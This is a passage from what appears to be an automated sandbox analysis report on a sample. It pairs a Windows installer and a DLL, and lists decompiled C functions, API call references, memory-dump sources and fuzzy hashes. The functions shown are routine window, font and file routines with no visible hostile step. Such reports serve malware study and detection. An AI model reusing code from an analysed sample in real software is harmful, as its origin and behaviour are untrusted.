                                                                                                                                                    • IsWindow.USER32(?), ref: 6E65EB22
                                                                                                                                                    • DeferWindowPos.USER32(00000000,00000000,00000000,?,?,?,?,00000000), ref: 6E65EB72
                                                                                                                                                    • EndDeferWindowPos.USER32(00000000), ref: 6E65EB7D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Defer$Begin
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2880567340-0
                                                                                                                                                    • Opcode ID: 7015cfa65aef4888d075c2daeea978861174a8c933c603841533dfcc5b058281
                                                                                                                                                    • Instruction ID: 6f3915147b344527aca180884c9d577d6957ee7a5c7147a232cd9b06da088773
                                                                                                                                                    • Opcode Fuzzy Hash: 7015cfa65aef4888d075c2daeea978861174a8c933c603841533dfcc5b058281
                                                                                                                                                    • Instruction Fuzzy Hash: 11211771E0021AAFDF41CFE9C944AAEBBF8FB09301F10446AE516E3351D730AA508BA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E630F80, Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::ios_base::good.LIBCPMTD ref: 6E630FAB
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000104,00000104,?,3920FDCC,?,6E624BB0,?), ref: 6E630FF8
                                                                                                                                                    • _DebugHeapAllocator.LIBCPMTD ref: 6E631013
                                                                                                                                                    • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6E631022
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocatorBase::Concurrency::details::ContextDebugEnvironmentExpandHeapIdentityQueueStringsWorkstd::ios_base::good
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1751677490-0
                                                                                                                                                    • Opcode ID: e18908ce370167a2e74202904000f903d29e14ce737a0bea4340e7401408af5f
                                                                                                                                                    • Instruction ID: 27138f06b5830039d70d6c9458e880570796cb16274964202e9da6a0519cada5
                                                                                                                                                    • Opcode Fuzzy Hash: e18908ce370167a2e74202904000f903d29e14ce737a0bea4340e7401408af5f
                                                                                                                                                    • Instruction Fuzzy Hash: 05211D70900119AFCB04DFE4CD50BEFB7B8FB05754F504A29A825A72D0DB346A45CF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65DE34, Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnableMenuItem.USER32 ref: 6E65DE63
                                                                                                                                                    • GetFocus.USER32 ref: 6E65DE7D
                                                                                                                                                    • GetParent.USER32(?), ref: 6E65DE88
                                                                                                                                                    • SendMessageW.USER32(?,00000028,00000000,00000000), ref: 6E65DE9D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnableFocusItemMenuMessageParentSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2297321873-0
                                                                                                                                                    • Opcode ID: 32e042c39f2f79fdbf8df332610509b6f740693664c848d5f2bc51790b960f40
                                                                                                                                                    • Instruction ID: 8d6ebac4e37b153d07aabd5c55b50ca123549b0817f8f6d2c027d2d8428ae5b7
                                                                                                                                                    • Opcode Fuzzy Hash: 32e042c39f2f79fdbf8df332610509b6f740693664c848d5f2bc51790b960f40
                                                                                                                                                    • Instruction Fuzzy Hash: C811E131350B01EFE7209FA5C848B5BB7B9BF62711F204A19F526967D0C770F8908AA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004020F9, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 42%
                                                                                                                                                    			E004020F9() {
				void* __esi;
				signed int _t8;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t26;
				void* _t28;
				void* _t30;

				_push(0x48);
				_push(GetDeviceCaps(GetDC( *(_t30 - 0xc)), 0x5a));
				_t20 = 2;
				_t8 = MulDiv(E00401446(_t20), ??, ??);
				_t21 = 3;
				0x420110->lfHeight =  ~_t8;
				 *0x420120 = E00401446(_t21);
				_t11 =  *((intOrPtr*)(_t30 - 0x1c));
				 *0x420124 = _t11 & 0x00000001;
				 *0x420125 = _t11 & 0x00000002;
				 *0x420126 = _t11 & 0x00000004;
				 *0x420127 = 1;
				E00406831(_t18, _t26, _t28, 0x42012c,  *((intOrPtr*)(_t30 - 0x28)));
				_t14 = CreateFontIndirectW(0x420110);
				_push(_t14);
				_push(_t28);
				E00405F7D();
				 *0x47eb68 =  *0x47eb68 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}













                                                                                                                                                    0x004020f9
                                                                                                                                                    0x0040210d
                                                                                                                                                    0x00402110
                                                                                                                                                    0x00402117
                                                                                                                                                    0x00402121
                                                                                                                                                    0x00402122
                                                                                                                                                    0x0040212f
                                                                                                                                                    0x00402134
                                                                                                                                                    0x0040213c
                                                                                                                                                    0x0040214e
                                                                                                                                                    0x00402154
                                                                                                                                                    0x00402159
                                                                                                                                                    0x00402160
                                                                                                                                                    0x0040216a
                                                                                                                                                    0x004030dc
                                                                                                                                                    0x004030dd
                                                                                                                                                    0x004030de
                                                                                                                                                    0x004030e6
                                                                                                                                                    0x004030f2

                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(?), ref: 00402100
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425AD2,74B5EA30,00000000), ref: 00406902
                                                                                                                                                    • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1599320355-0
                                                                                                                                                    • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                    • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                    • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                    • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E656497, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 6E6564A1
                                                                                                                                                    • GetTopWindow.USER32(00000000), ref: 6E6564AE
                                                                                                                                                      • Part of subcall function 6E656497: GetWindow.USER32(00000000,00000002), ref: 6E6564FD
                                                                                                                                                    • GetTopWindow.USER32(?), ref: 6E6564E2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 369458955-0
                                                                                                                                                    • Opcode ID: 64c6f13b17dc6b1cbf830f3a57102838fb2d1fb052ceadc64310ec063f83dac5
                                                                                                                                                    • Instruction ID: 7588c93222c6f958ab9e6b4de964c02301d625ebea939a21cb232700ddbc32d4
                                                                                                                                                    • Opcode Fuzzy Hash: 64c6f13b17dc6b1cbf830f3a57102838fb2d1fb052ceadc64310ec063f83dac5
                                                                                                                                                    • Instruction Fuzzy Hash: 5B014B312A1A26BBDF521EE18C04A9F3B68AF137A9F008414FD05A4318EB31C670D6E5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E636550, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DestroyWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3375834691-0
                                                                                                                                                    • Opcode ID: 994c4bb81f7fd93854985b9f453830bb211d3a891983134191a9deb4eae0f761
                                                                                                                                                    • Instruction ID: 5cbbce34157845b833394be5509020909ac5f81f5b1accda1b920c57958a677b
                                                                                                                                                    • Opcode Fuzzy Hash: 994c4bb81f7fd93854985b9f453830bb211d3a891983134191a9deb4eae0f761
                                                                                                                                                    • Instruction Fuzzy Hash: 7D11C578A00208EFCB00CF94C598B9EB7B2FB4A315F609698D8055B395C775EE81DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E66EC00, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,6E66ED19,00000000,?,6E6769CB,00000104,00000104,6E66ED19,?,?,?,00000104,00000001), ref: 6E66EC16
                                                                                                                                                    • GetLastError.KERNEL32(?,6E6769CB,00000104,00000104,6E66ED19,?,?,?,00000104,00000001,00000000,00000000,?,6E66ED19,00000104,00000104), ref: 6E66EC20
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E66EC27
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2398240785-0
                                                                                                                                                    • Opcode ID: 567daf0907b55dae4d54b516a87394cbce4e3abcf7e54adecb330bb87a4198fc
                                                                                                                                                    • Instruction ID: 7929291c2c65a632869c7d1ec50586fafe271cc92aa9a7ebab2c27b91ad75e39
                                                                                                                                                    • Opcode Fuzzy Hash: 567daf0907b55dae4d54b516a87394cbce4e3abcf7e54adecb330bb87a4198fc
                                                                                                                                                    • Instruction Fuzzy Hash: ADF01932620516BBDB205FE7DC48C87BF6AFF863A03048911E929D6510DB31EA61DBE1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E66EB97, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,6E66ED19,00000000,?,6E676A40,00000104,00000104,?,?,?,00000104,00000001,00000000), ref: 6E66EBAD
                                                                                                                                                    • GetLastError.KERNEL32(?,6E676A40,00000104,00000104,?,?,?,00000104,00000001,00000000,00000000,?,6E66ED19,00000104,00000104), ref: 6E66EBB7
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E66EBBE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2398240785-0
                                                                                                                                                    • Opcode ID: 55c7b4f08e8ebd2d035d121c7a3d6d66ce767eb8cf2b804879329fa5e675840e
                                                                                                                                                    • Instruction ID: 0d1e1b1880cad3ec2ab1bdf43cf96f99d4c2daa678cb44b7db707444c3f5bfab
                                                                                                                                                    • Opcode Fuzzy Hash: 55c7b4f08e8ebd2d035d121c7a3d6d66ce767eb8cf2b804879329fa5e675840e
                                                                                                                                                    • Instruction Fuzzy Hash: 4BF06936610526BBCB105FE6CD18C86BF6AFF863A43008912B91AC6610CB71E960CBE1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407224, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00407224(void* __eflags, WCHAR* _a4, WCHAR* _a8, int _a12) {
				short _v8;
				short _v24;
				char _v264;
				char _v280;
				void* _t20;
				WCHAR* _t22;

				_t20 = E00406EFE(_a4, 5,  &_v280, 0x80);
				if(_t20 == 1) {
					_t22 =  &_v280;
					lstrcpynW( &_v24, _t22, 9);
					_v8 = 0;
					if(lstrcmpW( &_v24, L"Version ") == 0) {
						_t22 =  &_v264;
					}
					lstrcpynW(_a8, _t22, _a12);
				}
				return _t20;
			}









                                                                                                                                                    0x00407244
                                                                                                                                                    0x0040724c
                                                                                                                                                    0x00407256
                                                                                                                                                    0x00407265
                                                                                                                                                    0x00407269
                                                                                                                                                    0x0040727e
                                                                                                                                                    0x00407280
                                                                                                                                                    0x00407280
                                                                                                                                                    0x0040728d
                                                                                                                                                    0x00407290
                                                                                                                                                    0x00407295

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                    • String ID: Version
                                                                                                                                                    • API String ID: 512980652-315105994
                                                                                                                                                    • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                    • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                    • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                    • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65852A, Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2353593579-0
                                                                                                                                                    • Opcode ID: 7e70f439f2ad3b2e7b18fae16bc1c8436f42f13803c11a4be6afd56ab1d59804
                                                                                                                                                    • Instruction ID: e949960b863adce9ee4023b991e0a276d95f2ab615be5aa869429b1da7acd0ae
                                                                                                                                                    • Opcode Fuzzy Hash: 7e70f439f2ad3b2e7b18fae16bc1c8436f42f13803c11a4be6afd56ab1d59804
                                                                                                                                                    • Instruction Fuzzy Hash: CBF0E732151A1AFFCF935F91DC08ADF3B29AF1B751F004020FA1654661C7358AB1EBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004032D2, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004032D2(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42c170; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x47eb00;
						if(_t2 >  *0x47eb00) {
							_t3 = CreateDialogParamW( *0x47eab8, 0x6f, 0, E0040324C, 0);
							 *0x42c170 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040635E(0);
					}
				} else {
					_t6 =  *0x42c170; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42c170 = 0;
					return _t6;
				}
			}






                                                                                                                                                    0x004032d9
                                                                                                                                                    0x004032f3
                                                                                                                                                    0x004032f9
                                                                                                                                                    0x00403303
                                                                                                                                                    0x00403309
                                                                                                                                                    0x0040330f
                                                                                                                                                    0x00403320
                                                                                                                                                    0x00403329
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040332e
                                                                                                                                                    0x00403335
                                                                                                                                                    0x004032fb
                                                                                                                                                    0x00403302
                                                                                                                                                    0x00403302
                                                                                                                                                    0x004032db
                                                                                                                                                    0x004032db
                                                                                                                                                    0x004032e2
                                                                                                                                                    0x004032e5
                                                                                                                                                    0x004032e5
                                                                                                                                                    0x004032eb
                                                                                                                                                    0x004032f2
                                                                                                                                                    0x004032f2

                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                    • CreateDialogParamW.USER32 ref: 00403320
                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                    • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                    • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                    • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                    • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406391, Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00406391(struct HINSTANCE__* _a4, short* _a8) {
				void* _t3;
				void* _t8;
				_Unknown_base(*)()* _t9;

				_t3 = GlobalAlloc(0x40, 0x2004);
				_t9 = 0;
				_t8 = _t3;
				if(WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t8, 0x2004, 0, 0) != 0) {
					_t9 = GetProcAddress(_a4, _t8);
				}
				GlobalFree(_t8);
				return _t9;
			}






                                                                                                                                                    0x0040639c
                                                                                                                                                    0x004063a2
                                                                                                                                                    0x004063a7
                                                                                                                                                    0x004063ba
                                                                                                                                                    0x004063c7
                                                                                                                                                    0x004063c7
                                                                                                                                                    0x004063ca
                                                                                                                                                    0x004063d5

                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 004063CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                                    • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                    • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                    • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                    • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E67E5DB, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,6E67CB50,00000000,00000001,00000000,00000000,?,6E675E59,00000000,?,00000000), ref: 6E67E5F2
                                                                                                                                                    • GetLastError.KERNEL32(?,6E67CB50,00000000,00000001,00000000,00000000,?,6E675E59,00000000,?,00000000,00000000,00000000,?,6E6763AD,?), ref: 6E67E5FE
                                                                                                                                                      • Part of subcall function 6E67E5C4: CloseHandle.KERNEL32(FFFFFFFE,6E67E60E,?,6E67CB50,00000000,00000001,00000000,00000000,?,6E675E59,00000000,?,00000000,00000000,00000000), ref: 6E67E5D4
                                                                                                                                                    • ___initconout.LIBCMT ref: 6E67E60E
                                                                                                                                                      • Part of subcall function 6E67E586: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E67E5B5,6E67CB3D,00000000,?,6E675E59,00000000,?,00000000,00000000), ref: 6E67E599
